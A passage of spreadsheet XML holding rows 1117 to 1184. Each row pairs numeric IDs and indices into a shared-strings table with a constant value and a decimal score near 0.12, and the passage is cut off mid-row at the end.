    <row r="1117" ht="15.75" customHeight="1">
      <c r="A1117" s="1">
        <v>19586.0</v>
      </c>
      <c r="B1117" s="2">
        <v>5.6158796E7</v>
      </c>
      <c r="C1117" s="2" t="s">
        <v>998</v>
      </c>
      <c r="D1117" s="2">
        <v>1.0</v>
      </c>
      <c r="E1117" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1117" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1118" ht="15.75" customHeight="1">
      <c r="A1118" s="1">
        <v>20122.0</v>
      </c>
      <c r="B1118" s="2">
        <v>6109799.0</v>
      </c>
      <c r="C1118" s="2" t="s">
        <v>999</v>
      </c>
      <c r="D1118" s="2">
        <v>1.0</v>
      </c>
      <c r="E1118" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1118" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1119" ht="15.75" customHeight="1">
      <c r="A1119" s="1">
        <v>20395.0</v>
      </c>
      <c r="B1119" s="2">
        <v>1.2123531E7</v>
      </c>
      <c r="C1119" s="2" t="s">
        <v>1000</v>
      </c>
      <c r="D1119" s="2">
        <v>1.0</v>
      </c>
      <c r="E1119" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1119" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1120" ht="15.75" customHeight="1">
      <c r="A1120" s="1">
        <v>20397.0</v>
      </c>
      <c r="B1120" s="2">
        <v>1.2158019E7</v>
      </c>
      <c r="C1120" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="D1120" s="2">
        <v>1.0</v>
      </c>
      <c r="E1120" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1120" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1121" ht="15.75" customHeight="1">
      <c r="A1121" s="1">
        <v>20456.0</v>
      </c>
      <c r="B1121" s="2">
        <v>1.2609378E7</v>
      </c>
      <c r="C1121" s="2" t="s">
        <v>1002</v>
      </c>
      <c r="D1121" s="2">
        <v>1.0</v>
      </c>
      <c r="E1121" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1121" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1122" ht="15.75" customHeight="1">
      <c r="A1122" s="1">
        <v>20496.0</v>
      </c>
      <c r="B1122" s="2">
        <v>1.2875989E7</v>
      </c>
      <c r="C1122" s="2" t="s">
        <v>1003</v>
      </c>
      <c r="D1122" s="2">
        <v>1.0</v>
      </c>
      <c r="E1122" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1122" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1123" ht="15.75" customHeight="1">
      <c r="A1123" s="1">
        <v>20837.0</v>
      </c>
      <c r="B1123" s="2">
        <v>1.5570234E7</v>
      </c>
      <c r="C1123" s="2" t="s">
        <v>1004</v>
      </c>
      <c r="D1123" s="2">
        <v>1.0</v>
      </c>
      <c r="E1123" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1123" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1124" ht="15.75" customHeight="1">
      <c r="A1124" s="1">
        <v>20986.0</v>
      </c>
      <c r="B1124" s="2">
        <v>1.7012667E7</v>
      </c>
      <c r="C1124" s="2" t="s">
        <v>1005</v>
      </c>
      <c r="D1124" s="2">
        <v>1.0</v>
      </c>
      <c r="E1124" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1124" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1125" ht="15.75" customHeight="1">
      <c r="A1125" s="1">
        <v>21089.0</v>
      </c>
      <c r="B1125" s="2">
        <v>1.80598E7</v>
      </c>
      <c r="C1125" s="2" t="s">
        <v>1006</v>
      </c>
      <c r="D1125" s="2">
        <v>1.0</v>
      </c>
      <c r="E1125" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1125" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1126" ht="15.75" customHeight="1">
      <c r="A1126" s="1">
        <v>21539.0</v>
      </c>
      <c r="B1126" s="2">
        <v>2.3520223E7</v>
      </c>
      <c r="C1126" s="2" t="s">
        <v>1007</v>
      </c>
      <c r="D1126" s="2">
        <v>1.0</v>
      </c>
      <c r="E1126" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1126" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1127" ht="15.75" customHeight="1">
      <c r="A1127" s="1">
        <v>21877.0</v>
      </c>
      <c r="B1127" s="2">
        <v>2.7639172E7</v>
      </c>
      <c r="C1127" s="2" t="s">
        <v>1008</v>
      </c>
      <c r="D1127" s="2">
        <v>1.0</v>
      </c>
      <c r="E1127" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1127" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1128" ht="15.75" customHeight="1">
      <c r="A1128" s="1">
        <v>22087.0</v>
      </c>
      <c r="B1128" s="2">
        <v>3.0760951E7</v>
      </c>
      <c r="C1128" s="2" t="s">
        <v>1009</v>
      </c>
      <c r="D1128" s="2">
        <v>1.0</v>
      </c>
      <c r="E1128" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1128" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1129" ht="15.75" customHeight="1">
      <c r="A1129" s="1">
        <v>22335.0</v>
      </c>
      <c r="B1129" s="2">
        <v>3.4377878E7</v>
      </c>
      <c r="C1129" s="2" t="s">
        <v>1010</v>
      </c>
      <c r="D1129" s="2">
        <v>1.0</v>
      </c>
      <c r="E1129" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1129" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1130" ht="15.75" customHeight="1">
      <c r="A1130" s="1">
        <v>22673.0</v>
      </c>
      <c r="B1130" s="2">
        <v>4.1685817E7</v>
      </c>
      <c r="C1130" s="2" t="s">
        <v>1011</v>
      </c>
      <c r="D1130" s="2">
        <v>1.0</v>
      </c>
      <c r="E1130" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1130" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1131" ht="15.75" customHeight="1">
      <c r="A1131" s="1">
        <v>22696.0</v>
      </c>
      <c r="B1131" s="2">
        <v>4.2362656E7</v>
      </c>
      <c r="C1131" s="2" t="s">
        <v>1012</v>
      </c>
      <c r="D1131" s="2">
        <v>1.0</v>
      </c>
      <c r="E1131" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1131" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1132" ht="15.75" customHeight="1">
      <c r="A1132" s="1">
        <v>23674.0</v>
      </c>
      <c r="B1132" s="2">
        <v>6925395.0</v>
      </c>
      <c r="C1132" s="2" t="s">
        <v>1013</v>
      </c>
      <c r="D1132" s="2">
        <v>1.0</v>
      </c>
      <c r="E1132" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1132" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1133" ht="15.75" customHeight="1">
      <c r="A1133" s="1">
        <v>23938.0</v>
      </c>
      <c r="B1133" s="2">
        <v>8755892.0</v>
      </c>
      <c r="C1133" s="2" t="s">
        <v>1014</v>
      </c>
      <c r="D1133" s="2">
        <v>1.0</v>
      </c>
      <c r="E1133" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1133" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1134" ht="15.75" customHeight="1">
      <c r="A1134" s="1">
        <v>23943.0</v>
      </c>
      <c r="B1134" s="2">
        <v>8831757.0</v>
      </c>
      <c r="C1134" s="2" t="s">
        <v>1015</v>
      </c>
      <c r="D1134" s="2">
        <v>1.0</v>
      </c>
      <c r="E1134" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1134" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1135" ht="15.75" customHeight="1">
      <c r="A1135" s="1">
        <v>23956.0</v>
      </c>
      <c r="B1135" s="2">
        <v>8940831.0</v>
      </c>
      <c r="C1135" s="2" t="s">
        <v>1016</v>
      </c>
      <c r="D1135" s="2">
        <v>1.0</v>
      </c>
      <c r="E1135" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1135" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1136" ht="15.75" customHeight="1">
      <c r="A1136" s="1">
        <v>23968.0</v>
      </c>
      <c r="B1136" s="2">
        <v>9036144.0</v>
      </c>
      <c r="C1136" s="2" t="s">
        <v>1017</v>
      </c>
      <c r="D1136" s="2">
        <v>1.0</v>
      </c>
      <c r="E1136" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1136" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1137" ht="15.75" customHeight="1">
      <c r="A1137" s="1">
        <v>24969.0</v>
      </c>
      <c r="B1137" s="2">
        <v>1.2609377E7</v>
      </c>
      <c r="C1137" s="2" t="s">
        <v>1002</v>
      </c>
      <c r="D1137" s="2">
        <v>1.0</v>
      </c>
      <c r="E1137" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1137" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1138" ht="15.75" customHeight="1">
      <c r="A1138" s="1">
        <v>25071.0</v>
      </c>
      <c r="B1138" s="2">
        <v>1.2875988E7</v>
      </c>
      <c r="C1138" s="2" t="s">
        <v>1018</v>
      </c>
      <c r="D1138" s="2">
        <v>1.0</v>
      </c>
      <c r="E1138" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1138" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1139" ht="15.75" customHeight="1">
      <c r="A1139" s="1">
        <v>25389.0</v>
      </c>
      <c r="B1139" s="2">
        <v>1.3691735E7</v>
      </c>
      <c r="C1139" s="2" t="s">
        <v>1019</v>
      </c>
      <c r="D1139" s="2">
        <v>1.0</v>
      </c>
      <c r="E1139" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1139" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1140" ht="15.75" customHeight="1">
      <c r="A1140" s="1">
        <v>25627.0</v>
      </c>
      <c r="B1140" s="2">
        <v>1.4460434E7</v>
      </c>
      <c r="C1140" s="2" t="s">
        <v>1020</v>
      </c>
      <c r="D1140" s="2">
        <v>1.0</v>
      </c>
      <c r="E1140" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1140" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1141" ht="15.75" customHeight="1">
      <c r="A1141" s="1">
        <v>25734.0</v>
      </c>
      <c r="B1141" s="2">
        <v>1.4584624E7</v>
      </c>
      <c r="C1141" s="2" t="s">
        <v>1021</v>
      </c>
      <c r="D1141" s="2">
        <v>1.0</v>
      </c>
      <c r="E1141" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1141" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1142" ht="15.75" customHeight="1">
      <c r="A1142" s="1">
        <v>26098.0</v>
      </c>
      <c r="B1142" s="2">
        <v>1.5735848E7</v>
      </c>
      <c r="C1142" s="2" t="s">
        <v>1022</v>
      </c>
      <c r="D1142" s="2">
        <v>1.0</v>
      </c>
      <c r="E1142" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1142" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1143" ht="15.75" customHeight="1">
      <c r="A1143" s="1">
        <v>26185.0</v>
      </c>
      <c r="B1143" s="2">
        <v>1.6157484E7</v>
      </c>
      <c r="C1143" s="2" t="s">
        <v>1023</v>
      </c>
      <c r="D1143" s="2">
        <v>1.0</v>
      </c>
      <c r="E1143" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1143" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1144" ht="15.75" customHeight="1">
      <c r="A1144" s="1">
        <v>26651.0</v>
      </c>
      <c r="B1144" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C1144" s="5" t="s">
        <v>1024</v>
      </c>
      <c r="D1144" s="2">
        <v>1.0</v>
      </c>
      <c r="E1144" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1144" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1145" ht="15.75" customHeight="1">
      <c r="A1145" s="1">
        <v>26894.0</v>
      </c>
      <c r="B1145" s="2">
        <v>1.9260248E7</v>
      </c>
      <c r="C1145" s="2" t="s">
        <v>1025</v>
      </c>
      <c r="D1145" s="2">
        <v>1.0</v>
      </c>
      <c r="E1145" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1145" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1146" ht="15.75" customHeight="1">
      <c r="A1146" s="1">
        <v>26929.0</v>
      </c>
      <c r="B1146" s="2">
        <v>1.9468567E7</v>
      </c>
      <c r="C1146" s="2" t="s">
        <v>1026</v>
      </c>
      <c r="D1146" s="2">
        <v>1.0</v>
      </c>
      <c r="E1146" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1146" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1147" ht="15.75" customHeight="1">
      <c r="A1147" s="1">
        <v>27204.0</v>
      </c>
      <c r="B1147" s="2">
        <v>2.0945939E7</v>
      </c>
      <c r="C1147" s="2" t="s">
        <v>1027</v>
      </c>
      <c r="D1147" s="2">
        <v>1.0</v>
      </c>
      <c r="E1147" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1147" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1148" ht="15.75" customHeight="1">
      <c r="A1148" s="1">
        <v>27205.0</v>
      </c>
      <c r="B1148" s="2">
        <v>2.0945989E7</v>
      </c>
      <c r="C1148" s="2" t="s">
        <v>1028</v>
      </c>
      <c r="D1148" s="2">
        <v>1.0</v>
      </c>
      <c r="E1148" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1148" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1149" ht="15.75" customHeight="1">
      <c r="A1149" s="1">
        <v>27933.0</v>
      </c>
      <c r="B1149" s="2">
        <v>2.3791911E7</v>
      </c>
      <c r="C1149" s="2" t="s">
        <v>1029</v>
      </c>
      <c r="D1149" s="2">
        <v>1.0</v>
      </c>
      <c r="E1149" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1149" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1150" ht="15.75" customHeight="1">
      <c r="A1150" s="1">
        <v>28122.0</v>
      </c>
      <c r="B1150" s="2">
        <v>2.4705237E7</v>
      </c>
      <c r="C1150" s="2" t="s">
        <v>1030</v>
      </c>
      <c r="D1150" s="2">
        <v>1.0</v>
      </c>
      <c r="E1150" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1150" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1151" ht="15.75" customHeight="1">
      <c r="A1151" s="1">
        <v>28674.0</v>
      </c>
      <c r="B1151" s="2">
        <v>2.7537903E7</v>
      </c>
      <c r="C1151" s="2" t="s">
        <v>1031</v>
      </c>
      <c r="D1151" s="2">
        <v>1.0</v>
      </c>
      <c r="E1151" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1151" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1152" ht="15.75" customHeight="1">
      <c r="A1152" s="1">
        <v>28951.0</v>
      </c>
      <c r="B1152" s="2">
        <v>2.9720701E7</v>
      </c>
      <c r="C1152" s="2" t="s">
        <v>1032</v>
      </c>
      <c r="D1152" s="2">
        <v>1.0</v>
      </c>
      <c r="E1152" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1152" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1153" ht="15.75" customHeight="1">
      <c r="A1153" s="1">
        <v>29502.0</v>
      </c>
      <c r="B1153" s="2">
        <v>3.2708482E7</v>
      </c>
      <c r="C1153" s="2" t="s">
        <v>1033</v>
      </c>
      <c r="D1153" s="2">
        <v>1.0</v>
      </c>
      <c r="E1153" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1153" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1154" ht="15.75" customHeight="1">
      <c r="A1154" s="1">
        <v>30035.0</v>
      </c>
      <c r="B1154" s="2">
        <v>3.6207907E7</v>
      </c>
      <c r="C1154" s="2" t="s">
        <v>1034</v>
      </c>
      <c r="D1154" s="2">
        <v>1.0</v>
      </c>
      <c r="E1154" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1154" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1155" ht="15.75" customHeight="1">
      <c r="A1155" s="1">
        <v>30275.0</v>
      </c>
      <c r="B1155" s="2">
        <v>3.7725834E7</v>
      </c>
      <c r="C1155" s="2" t="s">
        <v>1035</v>
      </c>
      <c r="D1155" s="2">
        <v>1.0</v>
      </c>
      <c r="E1155" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1155" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1156" ht="15.75" customHeight="1">
      <c r="A1156" s="1">
        <v>30641.0</v>
      </c>
      <c r="B1156" s="2">
        <v>4.1685816E7</v>
      </c>
      <c r="C1156" s="2" t="s">
        <v>1011</v>
      </c>
      <c r="D1156" s="2">
        <v>1.0</v>
      </c>
      <c r="E1156" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1156" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1157" ht="15.75" customHeight="1">
      <c r="A1157" s="1">
        <v>31021.0</v>
      </c>
      <c r="B1157" s="2">
        <v>4.7776948E7</v>
      </c>
      <c r="C1157" s="2" t="s">
        <v>1036</v>
      </c>
      <c r="D1157" s="2">
        <v>1.0</v>
      </c>
      <c r="E1157" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1157" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1158" ht="15.75" customHeight="1">
      <c r="A1158" s="1">
        <v>31095.0</v>
      </c>
      <c r="B1158" s="2">
        <v>4.8505825E7</v>
      </c>
      <c r="C1158" s="2" t="s">
        <v>1037</v>
      </c>
      <c r="D1158" s="2">
        <v>1.0</v>
      </c>
      <c r="E1158" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1158" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1159" ht="15.75" customHeight="1">
      <c r="A1159" s="1">
        <v>31397.0</v>
      </c>
      <c r="B1159" s="2">
        <v>4.9992928E7</v>
      </c>
      <c r="C1159" s="2" t="s">
        <v>1038</v>
      </c>
      <c r="D1159" s="2">
        <v>1.0</v>
      </c>
      <c r="E1159" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1159" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1160" ht="15.75" customHeight="1">
      <c r="A1160" s="1">
        <v>31449.0</v>
      </c>
      <c r="B1160" s="2">
        <v>5.031334E7</v>
      </c>
      <c r="C1160" s="2" t="s">
        <v>1039</v>
      </c>
      <c r="D1160" s="2">
        <v>1.0</v>
      </c>
      <c r="E1160" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1160" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1161" ht="15.75" customHeight="1">
      <c r="A1161" s="1">
        <v>31572.0</v>
      </c>
      <c r="B1161" s="2">
        <v>5124515.0</v>
      </c>
      <c r="C1161" s="2" t="s">
        <v>1040</v>
      </c>
      <c r="D1161" s="2">
        <v>1.0</v>
      </c>
      <c r="E1161" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1161" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1162" ht="15.75" customHeight="1">
      <c r="A1162" s="1">
        <v>31895.0</v>
      </c>
      <c r="B1162" s="2">
        <v>5290958.0</v>
      </c>
      <c r="C1162" s="2" t="s">
        <v>1041</v>
      </c>
      <c r="D1162" s="2">
        <v>1.0</v>
      </c>
      <c r="E1162" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1162" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1163" ht="15.75" customHeight="1">
      <c r="A1163" s="1">
        <v>32123.0</v>
      </c>
      <c r="B1163" s="2">
        <v>5.4095908E7</v>
      </c>
      <c r="C1163" s="2" t="s">
        <v>1042</v>
      </c>
      <c r="D1163" s="2">
        <v>1.0</v>
      </c>
      <c r="E1163" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1163" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1164" ht="15.75" customHeight="1">
      <c r="A1164" s="1">
        <v>32444.0</v>
      </c>
      <c r="B1164" s="2">
        <v>5669241.0</v>
      </c>
      <c r="C1164" s="2" t="s">
        <v>1043</v>
      </c>
      <c r="D1164" s="2">
        <v>1.0</v>
      </c>
      <c r="E1164" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1164" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1165" ht="15.75" customHeight="1">
      <c r="A1165" s="1">
        <v>15717.0</v>
      </c>
      <c r="B1165" s="2">
        <v>4.3974548E7</v>
      </c>
      <c r="C1165" s="2" t="s">
        <v>1044</v>
      </c>
      <c r="D1165" s="2">
        <v>1.0</v>
      </c>
      <c r="E1165" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1165" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="1166" ht="15.75" customHeight="1">
      <c r="A1166" s="1">
        <v>20250.0</v>
      </c>
      <c r="B1166" s="2">
        <v>1.0952129E7</v>
      </c>
      <c r="C1166" s="2" t="s">
        <v>1045</v>
      </c>
      <c r="D1166" s="2">
        <v>1.0</v>
      </c>
      <c r="E1166" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1166" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="1167" ht="15.75" customHeight="1">
      <c r="A1167" s="1">
        <v>23522.0</v>
      </c>
      <c r="B1167" s="2">
        <v>5857974.0</v>
      </c>
      <c r="C1167" s="2" t="s">
        <v>1046</v>
      </c>
      <c r="D1167" s="2">
        <v>1.0</v>
      </c>
      <c r="E1167" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1167" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="1168" ht="15.75" customHeight="1">
      <c r="A1168" s="1">
        <v>32822.0</v>
      </c>
      <c r="B1168" s="2">
        <v>6217476.0</v>
      </c>
      <c r="C1168" s="2" t="s">
        <v>1047</v>
      </c>
      <c r="D1168" s="2">
        <v>1.0</v>
      </c>
      <c r="E1168" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1168" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="1169" ht="15.75" customHeight="1">
      <c r="A1169" s="1">
        <v>28117.0</v>
      </c>
      <c r="B1169" s="2">
        <v>2.4677298E7</v>
      </c>
      <c r="C1169" s="2" t="s">
        <v>1048</v>
      </c>
      <c r="D1169" s="2">
        <v>1.0</v>
      </c>
      <c r="E1169" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1169" s="2">
        <v>0.121283255086072</v>
      </c>
    </row>
    <row r="1170" ht="15.75" customHeight="1">
      <c r="A1170" s="1">
        <v>27353.0</v>
      </c>
      <c r="B1170" s="2">
        <v>2.1534113E7</v>
      </c>
      <c r="C1170" s="2" t="s">
        <v>1049</v>
      </c>
      <c r="D1170" s="2">
        <v>1.0</v>
      </c>
      <c r="E1170" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1170" s="2">
        <v>0.121141975308642</v>
      </c>
    </row>
    <row r="1171" ht="15.75" customHeight="1">
      <c r="A1171" s="1">
        <v>20789.0</v>
      </c>
      <c r="B1171" s="2">
        <v>1.5156478E7</v>
      </c>
      <c r="C1171" s="2" t="s">
        <v>1050</v>
      </c>
      <c r="D1171" s="2">
        <v>1.0</v>
      </c>
      <c r="E1171" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1171" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="1172" ht="15.75" customHeight="1">
      <c r="A1172" s="1">
        <v>21201.0</v>
      </c>
      <c r="B1172" s="2">
        <v>1.9503298E7</v>
      </c>
      <c r="C1172" s="2" t="s">
        <v>1051</v>
      </c>
      <c r="D1172" s="2">
        <v>1.0</v>
      </c>
      <c r="E1172" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1172" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="1173" ht="15.75" customHeight="1">
      <c r="A1173" s="1">
        <v>31544.0</v>
      </c>
      <c r="B1173" s="2">
        <v>5108013.0</v>
      </c>
      <c r="C1173" s="2" t="s">
        <v>1052</v>
      </c>
      <c r="D1173" s="2">
        <v>1.0</v>
      </c>
      <c r="E1173" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1173" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="1174" ht="15.75" customHeight="1">
      <c r="A1174" s="1">
        <v>22440.0</v>
      </c>
      <c r="B1174" s="2">
        <v>3625041.0</v>
      </c>
      <c r="C1174" s="2" t="s">
        <v>1053</v>
      </c>
      <c r="D1174" s="2">
        <v>1.0</v>
      </c>
      <c r="E1174" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1174" s="2">
        <v>0.1208112874779541</v>
      </c>
    </row>
    <row r="1175" ht="15.75" customHeight="1">
      <c r="A1175" s="1">
        <v>31812.0</v>
      </c>
      <c r="B1175" s="2">
        <v>5251015.0</v>
      </c>
      <c r="C1175" s="2" t="s">
        <v>1054</v>
      </c>
      <c r="D1175" s="2">
        <v>1.0</v>
      </c>
      <c r="E1175" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1175" s="2">
        <v>0.1206597222222222</v>
      </c>
    </row>
    <row r="1176" ht="15.75" customHeight="1">
      <c r="A1176" s="1">
        <v>19064.0</v>
      </c>
      <c r="B1176" s="2">
        <v>5.4596122E7</v>
      </c>
      <c r="C1176" s="2" t="s">
        <v>1055</v>
      </c>
      <c r="D1176" s="2">
        <v>1.0</v>
      </c>
      <c r="E1176" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1176" s="2">
        <v>0.1205128205128205</v>
      </c>
    </row>
    <row r="1177" ht="15.75" customHeight="1">
      <c r="A1177" s="1">
        <v>28990.0</v>
      </c>
      <c r="B1177" s="2">
        <v>2.9846406E7</v>
      </c>
      <c r="C1177" s="2" t="s">
        <v>1056</v>
      </c>
      <c r="D1177" s="2">
        <v>1.0</v>
      </c>
      <c r="E1177" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1177" s="2">
        <v>0.1203703703703704</v>
      </c>
    </row>
    <row r="1178" ht="15.75" customHeight="1">
      <c r="A1178" s="1">
        <v>20800.0</v>
      </c>
      <c r="B1178" s="2">
        <v>1.527147E7</v>
      </c>
      <c r="C1178" s="2" t="s">
        <v>1057</v>
      </c>
      <c r="D1178" s="2">
        <v>1.0</v>
      </c>
      <c r="E1178" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1178" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="1179" ht="15.75" customHeight="1">
      <c r="A1179" s="1">
        <v>26424.0</v>
      </c>
      <c r="B1179" s="2">
        <v>1.7155444E7</v>
      </c>
      <c r="C1179" s="2" t="s">
        <v>1058</v>
      </c>
      <c r="D1179" s="2">
        <v>1.0</v>
      </c>
      <c r="E1179" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1179" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="1180" ht="15.75" customHeight="1">
      <c r="A1180" s="1">
        <v>10890.0</v>
      </c>
      <c r="B1180" s="2">
        <v>1.6562638E7</v>
      </c>
      <c r="C1180" s="2" t="s">
        <v>1059</v>
      </c>
      <c r="D1180" s="2">
        <v>1.0</v>
      </c>
      <c r="E1180" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1180" s="2">
        <v>0.1202531645569621</v>
      </c>
    </row>
    <row r="1181" ht="15.75" customHeight="1">
      <c r="A1181" s="1">
        <v>17188.0</v>
      </c>
      <c r="B1181" s="2">
        <v>4.8918456E7</v>
      </c>
      <c r="C1181" s="2" t="s">
        <v>1060</v>
      </c>
      <c r="D1181" s="2">
        <v>1.0</v>
      </c>
      <c r="E1181" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1181" s="2">
        <v>0.1202321724709784</v>
      </c>
    </row>
    <row r="1182" ht="15.75" customHeight="1">
      <c r="A1182" s="1">
        <v>20894.0</v>
      </c>
      <c r="B1182" s="2">
        <v>1.6230637E7</v>
      </c>
      <c r="C1182" s="2" t="s">
        <v>1061</v>
      </c>
      <c r="D1182" s="2">
        <v>1.0</v>
      </c>
      <c r="E1182" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1182" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="1183" ht="15.75" customHeight="1">
      <c r="A1183" s="1">
        <v>23615.0</v>
      </c>
      <c r="B1183" s="2">
        <v>6461198.0</v>
      </c>
      <c r="C1183" s="2" t="s">
        <v>1062</v>
      </c>
      <c r="D1183" s="2">
        <v>1.0</v>
      </c>
      <c r="E1183" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1183" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="1184" ht="15.75" customHeight="1">
      <c r="A1184" s="1">
        <v>15456.0</v>
      </c>
      <c r="B1184" s="2">
        <v>4.3077637E7</v>
      </c>
